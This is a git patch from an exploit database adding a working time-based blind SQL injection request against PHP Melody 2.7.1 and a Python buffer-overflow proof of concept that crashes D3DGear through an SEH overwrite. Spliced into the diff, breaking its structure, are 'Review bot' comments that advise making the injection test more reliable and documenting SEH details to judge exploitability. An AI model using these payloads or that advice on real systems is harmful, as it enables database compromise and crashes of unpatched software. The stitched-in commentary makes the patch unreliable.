From 07e51f4126f518780ad3ef8761cc1458e936dfb8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 1 Jan 2018 05:02:13 +0000
Subject: [PATCH] DB: 2018-01-01
2 changes to exploits/shellcodes
D3DGear 5.00 Build 2175 - Buffer Overflow
PHP Melody 2.7.1 - 'playlist' SQL Injection
---
 exploits/php/webapps/43409.txt | 22 ++++++++++++++++++++++
 exploits/windows/dos/43410.py | 25 +++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 49 insertions(+)
 create mode 100644 exploits/php/webapps/43409.txt
 create mode 100755 exploits/windows/dos/43410.py
diff --git a/exploits/php/webapps/43409.txt b/exploits/php/webapps/43409.txt
new file mode 100644
index 000000000..379d3a951
--- /dev/null
+++ b/exploits/php/webapps/43409.txt
@@ -0,0 +1,22 @@
+# Exploit Title: PHP Melody v2.7.1 - SQL Injection
+# Date: 30/12/2017
+# Exploit Author: Ahmad Mahfouz
+# Contact: http://twitter.com/eln1x
+# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
+# Version: 2.7.1
+# Tested on: Mac OS
+#
+# SQL Injection Type: time-based blind
+# Parameter: playlist
+# Page: ajax.php
+# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]
+
+
+
+GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
+Host: localhost
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
\ No newline at end of file
diff --git a/exploits/windows/dos/43410.py b/exploits/windows/dos/43410.py
new file mode 100755
index 000000000..10f6b38db
--- /dev/null
+++ b/exploits/windows/dos/43410.py
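Review bot: The header line `# URL: ...vid=[VALID_VIDO_ID]...` says the injection needs a valid video id, yet the raw request that follows sends `vid=randomid`, so someone replaying it verbatim may never reach the vulnerable query and will read a fast response as "not vulnerable"; the request should carry a real id to match the header (and `VIDO` should read `VIDEO`). A time-based check also needs a baseline before a 20-second delay is trusted: the same request with `sleep(0)` or without the payload should be timed first, since network latency or a slow target can mimic the delay. `# Tested on: Mac OS` describes the attacker's client rather than the affected server stack, which is what a reader needs for a server-side SQL injection; `# Tested on: PHP Melody 2.7.1 (server-side; client OS irrelevant)` would be clearer. The note in the header that the parameter reaches a MySQL query is implied by `sleep(20)` but never stated; one line naming the backend assumption would help.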
@@ -0,0 +1,25 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
+# Date: 07-11-2017
+# Vulnerable Software: D3DGear 5.00 Build 2175
+# Vendor Homepage: http://www.d3dgear.com/
+# Version: 5.00 Build 2175
+# Software Link: http://www.d3dgear.com/products.htm
+# Tested On: Windows 7 x86
+#
+#
+# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
+#
+# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
+#
+
+file = "crash.txt"
+
+buffer = "A"* 1284 + "B"*4
+writeFile = open (file, "w")
+writeFile.write( buffer )
+writeFile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 637bff09f..198a03d1d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5436,6 +5436,7 @@ id,file,description,date,author,type,platform,port
 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
 43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows,
+43410,exploits/windows/dos/43410.py,"D3DGear 5.00 Build 2175 - Buffer Overflow",2017-12-31,bzyo,dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
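Review bot: `writeFile = open (file, "w")` ... `writeFile.close()` leaves the handle open if the write raises, and `file` shadows a builtin; `with open("crash.txt", "w") as fh: fh.write(buffer)` does the same work in one statement and closes on every path. The header comment `00420042 Pointer to next SEH record` is consistent with the four `B` bytes landing in the nSEH slot after Unicode expansion of the stream-key field, but it does not say what value reached the SEH handler slot, which is what decides whether this is more than a crash; if that was observed, recording it next to the `one unicode ppr pointer` remark (with the module the pointer lives in) would let readers judge exploitability without re-running the PoC. The PoC comment should also state that the on-disk bytes are pasted into a Unicode field, so what reaches the stack is the wide-char expansion of this buffer, e.g. `# field is Unicode: each byte below is expanded to 00xx on the stack (hence 00420042)`.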
@@ -37679,6 +37680,7 @@ id,file,description,date,author,type,platform,port
 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
 43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
+43409,exploits/php/webapps/43409.txt,"PHP Melody 2.7.1 - 'playlist' SQL Injection",2017-12-31,"Ahmad Mahfouz",webapps,php,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,